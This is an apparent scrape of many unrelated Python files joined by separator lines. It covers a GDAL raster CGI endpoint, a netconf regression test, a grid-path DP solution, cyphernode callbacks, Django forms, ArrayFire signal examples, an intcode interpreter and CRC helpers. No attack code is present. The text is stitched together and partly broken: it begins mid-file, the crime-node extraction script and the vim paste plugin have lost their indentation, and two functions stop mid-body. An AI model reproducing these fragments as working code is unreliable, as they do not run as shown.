        cv2.imshow("image", image)
        cv2.waitKey(0)
#!/usr/bin/python
# CGI endpoint (Python 2): given lon/lat query parameters, sample the
# elevation raster at that point and print the value.
print "Content-type: text/html"
print
#print "<pre>"
import cgitb
import cgi
from osgeo import gdal,ogr
import struct
cgitb.enable()
# Requested point, in the raster's coordinate system.
form = cgi.FieldStorage()
mx = float(form.getvalue('lon'))
my = float(form.getvalue('lat'))
rast='/var/www/html/CartoLabFS16/Carto-Lab-Terroni/Map/Data/wellington5m.tif' #../
#open raster layer
src_ds=gdal.Open(rast)
gt=src_ds.GetGeoTransform()
#print gt
rb=src_ds.GetRasterBand(1)
#bandtype = gdal.GetDataTypeName(rb.DataType)
#print bandtype
gdal.UseExceptions() #so it doesn't print to screen everytime point is outside grid
# Convert world coordinates to pixel indices via the geotransform.
px = int((mx - gt[0]) / gt[1]) #x pixel
py = int((my - gt[3]) / gt[5]) #y pixel
#print px,py
try: #in case raster isnt full extent
    # NOTE(review): bare except below also hides non-extent errors (e.g. a
    # broken raster); -9998 is the sentinel for any failure.
    structval=rb.ReadRaster(px,py,1,1,buf_type=gdal.GDT_Float32) #Assumes 32 bit int- 'float'
    intval = struct.unpack('f' , structval) #assume float
    val=intval[0]
except:
    val=-9998 #or some value to indicate a fail
src_ds=None
ds=None
#print val
#174.855212,-41.18947
print(val)
#print "</pre>"
|
import re
# Split the corpus into sentences: break on [.;:?!] followed by whitespace
# and a capital letter (a simple heuristic; abbreviations are not handled).
sentences = []
with open('../../../data/nlp.txt', mode='r') as f:
    sentences.extend(re.split(r'[.;:?!]\s+(?=[A-Z])', f.read().strip()))
if __name__ == '__main__':
    for sentence in sentences:
        print(sentence)
|
# import calendar
import common
import sfc_netconf_regression_messages as sfc_nrm
import subprocess
import argparse
import time
import requests
__author__ = "Reinaldo Penno"
__author__ = "Andrej Kincel"
__copyright__ = "Copyright(c) 2014, Cisco Systems, Inc."
__license__ = "New-style BSD"
__version__ = "0.3"
__email__ = "rapenno@gmail.com"
__email__ = "andrej.kincel@gmail.com"
__status__ = "Tested with SFC-Karaf distribution as of 02/06/2015"
# java -Xmx1G -XX:MaxPermSize=256M -jar \
# netconf-testtool-0.3.0-20150320.211342-654-executable.jar
def run_netconf_tests():
    """Spawn a local netconf test-tool server, register it as a connector
    via REST, and verify the Netconf SFF was created.

    Blocks on user input before tearing the server process down.
    """
    process = None
    device_name = "sfc-netconf"
    print("Starting Netconf Server")
    try:
        # Two simulated devices; give the JVM a few seconds to come up.
        process = subprocess.Popen(
            ['java', '-Xmx1G', '-XX:MaxPermSize=256M', '-jar',
             'netconf-testtool-0.3.0-20150320.211342-654-executable.jar',
             '--device-count', '2'])
        time.sleep(5)
    except subprocess.CalledProcessError as e:
        print(e.output)
        return
    # input("Press Enter to continue to Auto-Provisioning...")
    try:
        # Register the device, wait for it to settle, then verify the SFF.
        common.post_netconf_connector(
            common.NETCONF_CONNECTOR_URL,
            sfc_nrm.NETCONF_CONNECTOR_XML.format(device_name, "localhost"))
        time.sleep(5)
        common.check(
            common.SFF_ONE_URL.format(device_name),
            sfc_nrm.SERVICE_FUNCTION_FORWARDER_NETCONF_JSON,
            "Checking if Netconf SFF was created successfully")
        input("Press Enter to finish tests")
    except requests.exceptions.RequestException:
        print("Error sending POST request to spawn netconf connector \n")
    finally:
        # Always kill the spawned server, even on failure.
        print("Finishing Tests...")
        process.kill()
    return
def main():
    """CLI entry point: optionally boot a Karaf instance, run the netconf
    regression tests, and always clean up the spawned process."""
    #: setup parser -----------------------------------------------------------
    parser = argparse.ArgumentParser(
        description='SFC Basic RestConf Regression',
        usage=("\npython3.4 sfc_netconf_regression --run-karaf "))
    parser.add_argument('--run-karaf', action='store_true',
                        help='Create SFC Karaf instance automatically')
    #: parse CMD arguments ----------------------------------------------------
    run_karaf = parser.parse_args().run_karaf
    p = None
    try:
        if not run_karaf:
            run_netconf_tests()
        else:
            p = common.initialize_karaf()
            if not common.check_sfc_initialized(p):
                print("Bypassing tests..")
            else:
                run_netconf_tests()
                p.terminate(force=True)
    except KeyboardInterrupt:
        pass
    finally:
        # Terminate Karaf even on Ctrl-C or an unexpected failure.
        if p:
            p.terminate(force=True)


if __name__ == "__main__":
    main()
|
from lazysql import Base, update_all, viewtable, db
class User(Base):
    """lazysql table 'users': columns are declared as (SQL type, constraint)
    tuples consumed by the Base metaclass/update_all()."""
    __tablename__ = 'users'
    user_id = ('SERIAL', 'PRIMARY KEY')
    username = ('varchar(256)', 'NOT NULL')
class Post(Base):
    """lazysql table 'posts': column declarations mirror User above."""
    __tablename__ = 'posts'
    post_id = ('SERIAL', 'PRIMARY KEY')
    text = ('varchar', 'NOT NULL')
# Demo script: sync the schema, insert one user, read it back two ways,
# then close the shared connection. Hits a live database.
update_all()
a = User()
print(a.username)  # presumably unset before create() — confirm lazysql default
a.create(user_id=29, username='john')
print(a.username)
b = a.selectone(user_id=29)
print(b.username)
print(viewtable(User))
db.close()
|
"""
Number of Paths
You’re testing a new driverless car that is located at the Southwest (bottom-left) corner of an n×n grid.
The car is supposed to get to the opposite, Northeast (top-right), corner of the grid. Given n, the size of the grid’s axes,
write a function numOfPathsToDest that returns the number of the possible paths the driverless car can take.
the car may move only in the white squares
For convenience, let’s represent every square in the grid as a pair (i,j).
The first coordinate in the pair denotes the east-to-west axis, and the second coordinate denotes the south-to-north axis.
The initial state of the car is (0,0), and the destination is (n-1,n-1).
The car must abide by the following two rules: it cannot cross the diagonal border.
In other words, in every step the position (i,j) needs to maintain i >= j. See the illustration above for n = 5.
In every step, it may go one square North (up), or one square East (right), but not both. E.g. if the car is at (3,1),
it may go to (3,2) or (4,1).
Explain the correctness of your function, and analyze its time and space complexities.
Example:
input: n = 4
output: 5 # since there are five possibilities:
# “EEENNN”, “EENENN”, “ENEENN”, “ENENEN”, “EENNEN”,
# where the 'E' character stands for moving one step
# East, and the 'N' character stands for moving one step
# North (so, for instance, the path sequence “EEENNN”
# stands for the following steps that the car took:
# East, East, East, North, North, North)
Constraints:
[time limit] 5000ms
[input] integer n
1 ≤ n ≤ 100
[output] integer
Grid 문제 dp
grid 경로 문제에서(대각선 이동 불가능 전제)
0 . 0 . 0 . 5
0 . 0 . 2 . 5
0 . 1 . 2 . 3
1 . 1 . 1 . 1
어느 지점 b로 오는 것을 두개의 누적경로 값(a, d)을 그냥 더하면 되는 이유는
b까지의 경로는 a까지의 경로 + d까지의 경로
a b
c d
조건상 해당 두 지점에서 밖에 올수 없는데
각각의 지점 까지 온 개수의 합을 하면 그게 b까지 오는 지점이 된다.
왜냐면 b까지는 해당 두지점으로부터 밖에 올수 없고,
두 지점까지의 경로의 개수가 각각 그것이므로.
* 누적 값의 합에 의해 변경해주는 순서는 Row by Row 헷갈리지 말 것.
* 처음에 모서리에 1을 깔아주는 이유는 그곳은 대각선이 아니므로 그곳으로 오는 두지점이란게 존재하지 않고,
오로지 그곳으로의 하나의 경로만 있기 떄문에 base로 깔아주는 것.
아래의 문제에선 조건이 하나 더있다. y(column) >= x(row) 여야만 한다.
각각의 문제의 조건을 잘 확인할 것.
"""
"""
Attention:
Explanation's (i, j) referring (col, row) => So, that can be translated to => (i >= j) == (col >= row)
(i)------->
x x x x |
x x x x |
x x x x |
x x x x V
(j)
# set 1 all of the first i line except the starting point
# That's because the way of each point of the line is only one
# Then we will go to every point we can (allowed by the constraint i >= j) and add up its (i-1) and (j-1) neighbors
# Then we can just simply return the last one
"""
def num_of_paths_to_dest(n):
    """Count monotone lattice paths from (0,0) to (n-1,n-1) that keep
    col >= row at every step (never crossing the diagonal).

    Row-by-row DP: each cell sums the counts of its left and lower
    neighbors. The result is the (n-1)-th Catalan number.
    """
    if n == 1:
        return 1
    table = [[0] * n for _ in range(n)]
    table[0] = [1] * n      # bottom edge: a single path reaches each cell
    table[0][0] = 0         # start cell contributes via its neighbors only
    for r in range(1, n):
        for c in range(r, n):   # only cells on/below the diagonal (c >= r)
            table[r][c] = table[r][c - 1] + table[r - 1][c]
    return table[-1][-1]
"""
0 1 1 1
0 1 2 3
0 0 2 5
0 0 0 5
"""
# Condition: i >= j
# i is for column, j is for row
# Time complexity: O((n-1)^2)
# Space complexity: O(n^2)
def num_of_paths_to_dest(n):
    """Diagonal-constrained path count on an n x n grid.

    paths[j][i] is the number of legal routes to column i, row j, where a
    route is legal while i >= j; the first row is seeded with ones since
    only one eastward path reaches each of its cells.
    """
    paths = [[0] * n for _ in range(n)]
    paths[0] = [1] * n
    for row in range(1, n):
        for col in range(row, n):   # cells with col >= row only
            paths[row][col] = paths[row - 1][col] + paths[row][col - 1]
    return paths[n - 1][n - 1]
# Smoke test: n = 4 has five diagonal-safe paths (Catalan number C_3).
test = num_of_paths_to_dest(4)
print(test)
|
"""Exemple of handling callback from cyphernode"""
from libcn.libcn import CallbackServer
import json
class WaitCallback(CallbackServer):
    """Example 'CallbackServer' subclass handling cyphernode callbacks.

    Each method name must match the final path segment of a callback URL
    configured in cyphernode (e.g. 'http://url:port/conf' is handled by
    conf()). The handler's return value is sent to the corresponding
    response topic; with no return a string 'True' is sent, and 'False'
    when the handler fails or does not exist.
    """

    def __init__(self, port):
        """Record the TCP port the callback server listens on."""
        # NOTE(review): the parent initialiser is deliberately not called
        # (see the original commented-out `super` line); confirm
        # CallbackServer tolerates being skipped.
        self.port = port

    @staticmethod
    def _btc(value):
        # Render a numeric amount as an 8-decimal bitcoin string.
        return '{} ₿'.format(format(value, '.8f'))

    def unconf(self):
        """Handle an unconfirmed-payment (watched address) callback.

        Payload fields include: id, address, hash, vout_n, sent_amount,
        confirmations, received, size, vsize, fees, is_replaceable,
        pub32, pub32_label, pub32_derivation_path, eventMessage."""
        if not self.callback:
            return
        call = json.loads(self.callback)
        amount = self._btc(call['sent_amount'])
        fees = self._btc(call['fees'])
        print('Adresse \'{}\' received {} at {} and the transaction fees is {}'
              .format(call['address'], amount, call['received'], fees))

    def conf(self):
        """Handle a confirmed-payment callback (same payload as unconf)."""
        if not self.callback:
            return
        call = json.loads(self.callback)
        amount = self._btc(call['sent_amount'])
        fees = self._btc(call['fees'])
        print('Confirmation of adresse \'{}\' received {} at {} and the transaction fees is {}'
              .format(call['address'], amount, call['received'], fees))

    def txunconf(self):
        """Handle an unconfirmed-transaction callback
        (fields: id, txid, confirmations)."""
        if not self.callback:
            return
        call = json.loads(self.callback)
        print('Transaction non confirmé = {}'.format(call))

    def txconf(self):
        """Handle a confirmed-transaction callback
        (fields: id, txid, confirmations)."""
        if not self.callback:
            return
        call = json.loads(self.callback)
        print('Transaction confirmé = {}'.format(call))

    def ln_invoice(self):
        """Handle a lightning-invoice callback."""
        if not self.callback:
            return
        call = json.loads(self.callback)
        print('Lightning invoice confirmé = {}'.format(call))

    def ln_connect(self):
        """Handle a lightning node-connected callback."""
        if not self.callback:
            return
        call = json.loads(self.callback)
        print('lightning connect confirmé = {}'.format(call))

    def ots_stamp(self):
        """Handle an OpenTimestamps stamp callback."""
        if not self.callback:
            return
        call = json.loads(self.callback)
        print('OTS stamp confirmé = {}'.format(call))
# Launch the callback server on port 2906; start() presumably blocks
# serving callbacks — confirm against libcn's CallbackServer.
WCB = WaitCallback(2906)
print('WaitCallback running ....')
WCB.start()
|
import json
import pickle
import sys
import getopt
from os import listdir
from os.path import isfile, join
import random
import pandas as pd
def checkinexclusion(nodename):
    """Filter a node type through the exclusion list.

    Returns None when *nodename* appears (one entry per line, whitespace
    stripped) in ./nodes/exclusion.nodes, otherwise returns *nodename*
    unchanged. The file is re-read on every call.
    """
    with open('./nodes/exclusion.nodes', 'r') as fh:
        excluded = {line.strip() for line in fh}
    return None if nodename in excluded else nodename
# Pick a random crime id not colliding with existing data files, then parse
# command-line flags for the node-extraction run.
datadir = './nodes/node_data/'
crimfiles = [f for f in listdir(datadir) if isfile(join(datadir, f))]
# NOTE(review): crmid is an int while crimfiles holds filename strings, so
# `crmid in crimfiles` is always False and this loop exits on the first
# draw — confirm whether str(crmid) (or a filename pattern) was intended.
while True:
    crmid = random.randint(0, 10000)
    if not crmid in crimfiles:
        break
argv = sys.argv[1:]
try:
    opts, args = getopt.getopt(argv, 'hnf:om:', ['help', 'nonodes', 'inputjson=', 'printoutput', 'crimeid=', 'personname='])
except getopt.GetoptError:
    print('Something went wrong!')
    sys.exit(2)
# Flag defaults: -n print node/link counts, -f input prefix, -o show node
# pairs, -m person name attached to the output record.
disp_node = False
shownodes = False
infile = ''
name = ''
for k, v in opts:
    if k == '-n':
        disp_node = True
    if k == '-f':
        infile = v
    if k == '-o':
        shownodes = True
    if k == '-m':
        name = v
    if k == '-h':
        print('please specify -f <location file> -m <name of guys> these are the most compulsory and important params')
        sys.exit()
#############################
dt = {}
n = 1
while True:
try:
file = infile + 'main' + str(n) + '.json'
with open(file) as f:
data = json.load(f)
nonodes = len(data['nodes'])
nolinks = len(data['links'])
if disp_node:
print(nonodes)
print(nolinks)
for x in range(0, nonodes):
if data['nodes'][x]['type'] == "Crime/CrimeID":
crmid = data['nodes'][x]['properties']['value']
origin = ''
connected = ''
nodesconnected = list()
for x in range(0, nolinks):
idcur = data['links'][x][1]
idtarg = data['links'][x][3]
for y in range(0, nonodes):
if data['nodes'][y]['id'] == idcur:
origin = checkinexclusion(data['nodes'][y]['type'])
if data['nodes'][y]['id'] == idtarg:
connected = checkinexclusion(data['nodes'][y]['type'])
nodesconnected.append(origin)
nodesconnected.append(connected)
#if shownodes : print('[' +str(origin)+','+str(connected)+']['+str(data['links'][x][2])+','+str(data['links'][x][4])+']')
nodesconnected = list(set(list(filter(None, nodesconnected))))
crmout = {'crmid': crmid, 'name': name, 'nodesall': nodesconnected, 'nonodes': len(nodesconnected), 'nolinks': nolinks}
print(crmout)
###########################################
nodesconnected = ['Mood/Alcoholic', 'Activity/Driving']
data['CrimeID'] = n
for i in nodesconnected:
val = i.split("/")
if val[0] in dt.keys():
dt[val[0]].append([val[1]])
else:
dt[val[0]] = [val[1]]
n += 1
except:
break
print(dt)
df = pd.DataFrame.from_dict(dt, orient='columns')
print(df.head())
df.to_csv('Clustering_NodeData/temp_data.csv', header=True, index=False)
###################################################
|
def hpaste():
import vim, sys, urllib, urllib2
enc = vim.eval('&fileencoding') or vim.eval('&encoding')
code = vim.eval('l:code').decode(enc, 'ignore').encode('utf-8')
title = vim.eval('input("Title: ")')
if not title:
print 'aborted'
return
author = vim.eval('s:GetHPasteAuthor()')
language = vim.eval('&filetype')
channel = vim.eval('input("Channel: ")')
data = urllib.urlencode({
'title' : title,
'author' : author,
'language' : language,
'channel' : channel,
'paste' : code,
'email' : ''
})
try:
res = urllib2.urlopen('http://lpaste.net/new', data)
paste = res.geturl()
print 'Created new paste %s' % paste
vim.command('call setreg("+", %r)' % paste)
finally:
res.close()
|
# Read n prices, then pay full price for everything except the most
# expensive item, which is half price (floor division).
n = int(input())
prices = [int(input()) for _ in range(n)]
print(sum(prices) - max(prices) // 2)
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
import matplotlib.animation as animation
# Figure with two empty lines (blue = Madrid, red = second region) that the
# animation fills in frame by frame.
fig, ax = plt.subplots()
xdata, ydata, xmydata, ymydata = [], [], [], []
ln1, = ax.plot([], [], 'b-')
ln2, = ax.plot([], [], 'r-')
# NOTE(review): hard-coded user path — parameterize before sharing.
data_spain_ccaa = pd.read_csv('/Users/alejandrosusillo/Downloads/serie_historica_acumulados.csv', sep=',')
# Last CSV row is a footer/notes line, not data.
data_spain_ccaa = data_spain_ccaa.drop(len(data_spain_ccaa) - 1)
# 'Casos ' (trailing space) is the real column name in this dataset.
data_spain_ccaa['Casos '] = data_spain_ccaa['Casos '].fillna(0)
data_spain_ccaa['Fallecidos'] = data_spain_ccaa['Fallecidos'].fillna(0)
# 2xN arrays: row 0 = cases, row 1 = deaths, one column per report date.
# NOTE(review): data_AN is filtered on 'CT' (Catalonia) despite the name.
data_MD = data_spain_ccaa[data_spain_ccaa['CCAA Codigo ISO'].isin(['MD'])][['Casos ', 'Fallecidos']].to_numpy().transpose().astype(int)
data_AN = data_spain_ccaa[data_spain_ccaa['CCAA Codigo ISO'].isin(['CT'])][['Casos ', 'Fallecidos']].to_numpy().transpose().astype(int)
# GET HEADERS FROM UI, X AND Y. GET THE MAXIMUM VALUE AMONG ALL THE GIVEN HEADERS. CREATE UNA LINE FOR EACH HEADER.
def init():
    """FuncAnimation init: fix the axis limits and return the artists that
    blitting should track (x = cases, y = deaths — see data layout above)."""
    ax.set_xlim(0, 15000)
    ax.set_ylim(0, 2000)
    return ln1,ln2,
def update(num, data_MD, data_AN, line1, line2):
    """FuncAnimation frame callback: reveal the first *num* columns of each
    2xN series (row 0 -> x, row 1 -> y) on its line artist.

    Fix: return the lines that were passed in. The original returned the
    module globals ln1/ln2, which silently ignored the *line1*/*line2*
    parameters and broke reuse with any other artists.
    """
    line1.set_data(data_MD[..., :num])
    line2.set_data(data_AN[..., :num])
    return line1, line2,
#Writer = animation.writers['ffmpeg']
#writer = Writer(fps=15, metadata=dict(artist='Me'), bitrate=1800)
# 50 frames, 100 ms apart; blit=True requires init/update to return artists.
ani = FuncAnimation(fig, update, 50, fargs=(data_MD, data_AN, ln1, ln2), interval=100, init_func=init, blit=True)
# Rendering to HTML5 video twice doubles the (slow) encode — the second call
# below re-renders just to print; reuse `test` if only one encode is wanted.
test = ani.to_html5_video()
test2 = print(ani.to_html5_video())  # NOTE(review): print() returns None, so test2 is always None
#test = ani.save('lines.mp4', writer=writer)
plt.show()
|
#!/usr/bin/python
def displayPathtoPrincess(n, grid):
    """Print the moves (one of UP/DOWN/LEFT/RIGHT per line) that take the
    bot 'm' to the princess 'p' on an n x n character grid.

    Rows index the first axis, so a positive row delta means DOWN and a
    positive column delta means RIGHT.
    """
    bot = [-1, -1]
    princess = [-1, -1]
    for r in range(n):
        for c in range(n):
            cell = grid[r][c]
            if cell == 'm':
                bot = [r, c]
            if cell == 'p':
                princess = [r, c]
    d_row = princess[0] - bot[0]
    d_col = princess[1] - bot[1]
    # Vertical moves first, then horizontal; range() of a non-positive
    # count is empty, so only the applicable direction prints.
    for _ in range(d_row):
        print("DOWN")
    for _ in range(-d_row):
        print("UP")
    for _ in range(d_col):
        print("RIGHT")
    for _ in range(-d_col):
        print("LEFT")
#m = int(input())
#grid = []
#for i in range(0, m):
#    grid.append(input().strip())
# Fixed 3x3 demo board instead of the stdin input above: bot at (1,1),
# princess at (2,0) -> expected output "DOWN" then "LEFT".
grid = []
m=3
grid.append("---")
grid.append("-m-")
grid.append("p--")
displayPathtoPrincess(m,grid)
|
# Copyright 2015, Pinterest, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
import unittest
from pinball_ext.executor import cluster_executor
# Module metadata for the cluster_executor unit test.
__author__ = 'Changshu Liu'
__copyright__ = 'Copyright 2015, Pinterest, Inc.'
__credits__ = [__author__]
__license__ = 'Apache'
__version__ = '2.0'
class ClusterExecutorTest(unittest.TestCase):
    """Construction test for cluster_executor.ClusterExecutor."""

    def test_creation(self):
        """String config values should surface on executor.config, with the
        comma-joined libjar dirs split back into a list."""
        libjar_dirs = ['/dir1/jar1/', '/dir2/jar2/']
        app_jar = '/dir/jar.jar'
        archive = '/dir/file.archive'
        platform = 'local'
        config = {
            'USER_LIBJAR_DIRS': ','.join(libjar_dirs),
            'USER_APPJAR_PATH': app_jar,
            'USER_ARCHIVE_PATH': archive,
            'PLATFORM': platform,
            'USER': 'test_user',
        }
        executor = cluster_executor.ClusterExecutor(executor_config=config)
        self.assertEqual(executor.config.USER_LIBJAR_DIRS, libjar_dirs)
        self.assertEqual(executor.config.USER_APPJAR_PATH, app_jar)
        self.assertEqual(executor.config.USER_ARCHIVE_PATH, archive)
        self.assertEqual(executor.config.PLATFORM, platform)
|
from django import forms
from django.forms import ModelForm
from .models import Profile
from django.contrib.auth.models import User
class CreateUserForm(forms.Form):
    """Registration form: username, password with confirmation, e-mail and
    real name. Labels are the user-facing (Spanish) strings."""
    Username = forms.CharField(max_length=20, label='Nombre de Usuario:')
    Password = forms.CharField(max_length=10, label='Password: ', widget=forms.PasswordInput)
    Check_Password = forms.CharField(max_length=10, label='Confirmar password: ', widget=forms.PasswordInput)
    Email = forms.EmailField(label='E-mail: ')
    First_name = forms.CharField(max_length=60, label='Nombre: ')
    Last_name = forms.CharField(max_length=80, label='Apellido: ')
class LoginUserForm(forms.Form):
    """Login form: plain username/password pair."""
    Username = forms.CharField(max_length=20, label='Nombre de Usuario: ')
    Password = forms.CharField(max_length=10, label='Password: ', widget=forms.PasswordInput)
class PerfilForm(ModelForm):
    """Profile edit form bound to the logged-in user.

    The extra *user* constructor argument (a username) pre-fills and locks
    the hidden 'user' field so a profile can only be created for oneself.
    """
    def __init__(self, user, *args, **kwargs):
        super (PerfilForm, self).__init__(*args, **kwargs)
        #self.fields['user'].queryset = User.objects.filter(username=user)
        # NOTE(review): filter(...)[0] raises IndexError when the username
        # does not exist; 'readonly' on a HiddenInput is also only a client
        # hint — the posted value should be validated server-side.
        self.fields['user'].widget.attrs['value'] = User.objects.filter(username=user)[0].pk
        self.fields['user'].widget.attrs['readonly'] = True

    class Meta:
        model = Profile
        fields = '__all__'
        exclude = ['imagen']
        widgets = {
            'user': forms.HiddenInput(),
            'imagen': forms.FileInput(attrs={'accept': 'image/*', 'capture': 'camera'}),
        }
        # User-facing (Spanish) labels for the address fields.
        labels = {
            'numero': 'Numero interior: ',
            'calle': 'Calle: ',
            'colonia': 'Colonia: ',
            'municipio': 'Municipio: ',
            'estado': 'Estado :',
            'ciudad': 'Ciudad: ',
            'pais': 'Pais: ',
        }
|
<h1>Mon titre principal</h1>
<h2>Mon titre de section</h2>
<h3>Mon sous-titre</h3>
<h4>Mon sous-sous-titre</h4> |
# project euler problem #2
# find sum of even valued fibonacci numbers
# more list comprehension go brrrrrrrrrrrrr but with more steps
# basically build a fibonacci generator then list comprehension it
def fib(n):
    """Yield Fibonacci numbers 1, 2, 3, 5, 8, ... not exceeding n."""
    a, b = 1, 2
    while a <= n:
        yield a
        a, b = b, a + b

# Project Euler #2: sum of the even Fibonacci terms up to four million.
print(sum(num for num in fib(4000000) if num % 2 == 0))
class Task:
    """A quiz item pairing a prompt with its expected answer."""

    def __init__(self, task, answer):
        """Remember the prompt text and the correct answer."""
        self.task = task
        self.answer = answer

    def get_task(self):
        """Return the prompt phrased for display."""
        return f"Your task is: {self.task}"

    def get_answer(self):
        """Return the correct answer phrased for display."""
        return f"The correct answer is: {self.answer}"
|
#!/usr/bin/python
#######################################################
# Copyright (c) 2015, ArrayFire
# All rights reserved.
#
# This file is distributed under 3-clause BSD license.
# The complete license agreement can be obtained at:
# http://arrayfire.com/licenses/BSD-3-Clause
########################################################
import arrayfire as af
# --- interpolation: 1D and 2D approx at random positions -----------------
a = af.randu(10, 1)
pos0 = af.randu(10) * 10
af.display(af.approx1(a, pos0))
a = af.randu(3, 3)
pos0 = af.randu(3, 3) * 10
pos1 = af.randu(3, 3) * 10
af.display(af.approx2(a, pos0, pos1))
# --- 1D FFT/DFT and inverse round trips (real part recovers the input) ---
a = af.randu(8, 1)
af.display(a)
af.display(af.fft(a))
af.display(af.dft(a))
af.display(af.real(af.ifft(af.fft(a))))
af.display(af.real(af.idft(af.dft(a))))
# --- 2D transforms -------------------------------------------------------
a = af.randu(4, 4)
af.display(a)
af.display(af.fft2(a))
af.display(af.dft(a))
af.display(af.real(af.ifft2(af.fft2(a))))
af.display(af.real(af.idft(af.dft(a))))
# --- 3D transforms -------------------------------------------------------
a = af.randu(4, 4, 2)
af.display(a)
af.display(af.fft3(a))
af.display(af.dft(a))
af.display(af.real(af.ifft3(af.fft3(a))))
af.display(af.real(af.idft(af.dft(a))))
# --- convolution: direct vs FFT-based, 1D --------------------------------
a = af.randu(10, 1)
b = af.randu(3, 1)
af.display(af.convolve1(a, b))
af.display(af.fft_convolve1(a, b))
af.display(af.convolve(a, b))
af.display(af.fft_convolve(a, b))
# --- convolution, 2D -----------------------------------------------------
a = af.randu(5, 5)
b = af.randu(3, 3)
af.display(af.convolve2(a, b))
af.display(af.fft_convolve2(a, b))
af.display(af.convolve(a, b))
af.display(af.fft_convolve(a, b))
# --- convolution, 3D -----------------------------------------------------
a = af.randu(5, 5, 3)
b = af.randu(3, 3, 2)
af.display(af.convolve3(a, b))
af.display(af.fft_convolve3(a, b))
af.display(af.convolve(a, b))
af.display(af.fft_convolve(a, b))
# --- digital filters: FIR and IIR ----------------------------------------
b = af.randu(3, 1)
x = af.randu(10, 1)
a = af.randu(2, 1)
af.display(af.fir(b, x))
af.display(af.iir(b, a, x))
|
def inicstr(str_data):
d = {}
if len(str_data) > 0:
lst = str_data.split('/')
if len(lst) > 3:
|
def getModeForParam(pos, data, ins):
    """Return True when parameter *pos* (1 or 2) of the intcode instruction
    at *ins* uses immediate mode, False for position mode.

    The mode digits live in the hundreds (param 1) and thousands (param 2)
    place of the opcode value. Any other *pos* falls through to None.

    Fix: the original used `is 1`, which tests object identity rather than
    equality; it only works via CPython's small-int cache and raises a
    SyntaxWarning on modern interpreters.
    """
    if pos == 1:
        return (data[ins] % 1000) // 100 == 1
    if pos == 2:
        return data[ins] // 1000 == 1
def getParamByMode(pos, data, ins):
    """Resolve operand *pos* of the instruction at *ins*: the raw value in
    immediate mode, otherwise the value stored at the addressed cell."""
    operand = data[ins + pos]
    return operand if getModeForParam(pos, data, ins) else data[operand]
def setValueAtPos(data, pos, val):
    """Indirect write: store *val* at the address held in cell *pos*."""
    target = data[pos]
    data[target] = val
# Intcode interpreter main loop (presumably Advent of Code 2019 day 5).
# The program is read as comma-separated integers from stdin; the system
# input value is hard-coded to 5 (day-5 part-2 input). Halts on opcode 99.
inp = input()
data = [int(x) for x in inp.split(',')]
inVal = 5
ins = 0
while data[ins] % 100 != 99:
    opcode = data[ins] % 100
    if opcode == 1:
        # add
        p1 = getParamByMode(1, data, ins)
        p2 = getParamByMode(2, data, ins)
        setValueAtPos(data, ins + 3, p1 + p2)
        ins += 4
    elif opcode == 2:
        # mul
        p1 = getParamByMode(1, data, ins)
        p2 = getParamByMode(2, data, ins)
        setValueAtPos(data, ins + 3, p1 * p2)
        ins += 4
    elif opcode == 3:
        # input
        setValueAtPos(data, ins + 1, inVal)
        ins += 2
    elif opcode == 4:
        # output
        p1 = getParamByMode(1, data, ins)
        print(p1)
        ins += 2
    elif opcode == 5:
        # jump-if-true
        p1 = getParamByMode(1, data, ins)
        p2 = getParamByMode(2, data, ins)
        if p1:
            ins = p2
        else:
            ins += 3
    elif opcode == 6:
        # jump-if-false
        p1 = getParamByMode(1, data, ins)
        p2 = getParamByMode(2, data, ins)
        if not p1:
            ins = p2
        else:
            ins += 3
    elif opcode == 7:
        # less than
        p1 = getParamByMode(1, data, ins)
        p2 = getParamByMode(2, data, ins)
        setValueAtPos(data, ins + 3, 1 if p1 < p2 else 0)
        ins += 4
    elif opcode == 8:
        # equals
        p1 = getParamByMode(1, data, ins)
        p2 = getParamByMode(2, data, ins)
        setValueAtPos(data, ins + 3, 1 if p1 == p2 else 0)
        ins += 4
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-01-31 05:12
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated by Django 1.11.9 (makemigrations); adds the UserInfo
    table with free-text gender/age fields. Avoid hand-editing —
    regenerate instead."""

    dependencies = [
        ('rcapp', '0006_recordings_device'),
    ]

    operations = [
        migrations.CreateModel(
            name='UserInfo',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('gender', models.CharField(default='unknown', max_length=7)),
                ('age', models.CharField(default='unknown', max_length=7)),
            ],
        ),
    ]
|
def findOne(strrr):
    """Return the index of the first '1' in *strrr* (a bit string or a list
    of single characters); raises ValueError when no '1' exists."""
    return strrr.index('1')
def checkRemainder(inputString, divisor):
    """XOR long-division check of *inputString* (data + appended CRC bits)
    against *divisor*; prints the remainder and returns '1' if any
    remainder bit is set, '0' otherwise."""
    global flag  # NOTE(review): `flag` is never read or written here — dead declaration.
    crcAdded = list(inputString)
    # crcAdded = crcAdded + list('0'*(len(crc_32)-1))
    # NOTE(review): with the padding line above commented out, len(crcAdded)
    # equals lenInput, so the [lenInput:] slice below is always empty and the
    # function can only return '0' when the division terminates; a leading
    # '1' within the last len(divisor)-1 positions also makes
    # `latestOne + i` run off the end (IndexError). Confirm whether the
    # padding was meant to be active.
    lenInput = len(inputString)
    lenDivisor = len(divisor)
    while '1' in crcAdded[:lenInput]:
        latestOne = findOne(crcAdded)
        # XOR the divisor into the bits starting at the leading '1'.
        for i in range(0, lenDivisor):
            if (divisor[i] == crcAdded[latestOne + i]):
                crcAdded[latestOne + i] = '0'
            else:
                crcAdded[latestOne + i] = '1'
    heyhey = ''.join(crcAdded)[lenInput:]
    print("Remainder: ", heyhey)
    # Any set bit in the remainder means the CRC check failed.
    for i in range(0, len(heyhey)):
        if(heyhey[i]=='1'):
            return '1'
    return '0'
def remainder(inputString, divisor):
    """CRC remainder of bit-string *inputString* modulo *divisor* via XOR
    long division.

    Three zero bits are appended (one less than the 4-bit divisor this
    script uses) and the trailing three bits after division are returned
    as the remainder string.
    """
    bits = list(inputString) + list('0' * 3)
    msg_len = len(inputString)
    div_len = len(divisor)
    # Cancel the leading '1' repeatedly until the message part is all zero.
